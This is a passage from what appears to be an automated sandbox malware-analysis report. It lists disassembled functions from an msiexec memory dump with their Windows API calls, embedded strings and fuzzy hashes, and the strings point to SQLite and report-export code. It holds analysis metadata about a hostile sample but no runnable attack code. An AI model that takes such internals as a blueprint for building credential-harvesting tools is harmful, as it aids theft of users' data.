                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                    • String ID: 6$\
                                                                                                    • API String ID: 404372293-1284684873
                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                    Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesErrorFileLastSleep$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1470729244-0
                                                                                                    • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                    • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1331804452-0
                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2521778956-791839006
                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                    • API String ID: 999028693-502967061
                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2350177629-0
                                                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 265355444-0
                                                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFilefreememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507021081-0
                                                                                                    • Opcode ID: 5cac469553244ff5f168fa98233ce63fad3a105106b6c43576a2ff5daf083681
                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                    • Opcode Fuzzy Hash: 5cac469553244ff5f168fa98233ce63fad3a105106b6c43576a2ff5daf083681
                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131324427-0
                                                                                                    • Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                    • Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathTemp$free
                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                    • API String ID: 924794160-1420421710
                                                                                                    • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                    • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 313946961-1552265934
                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
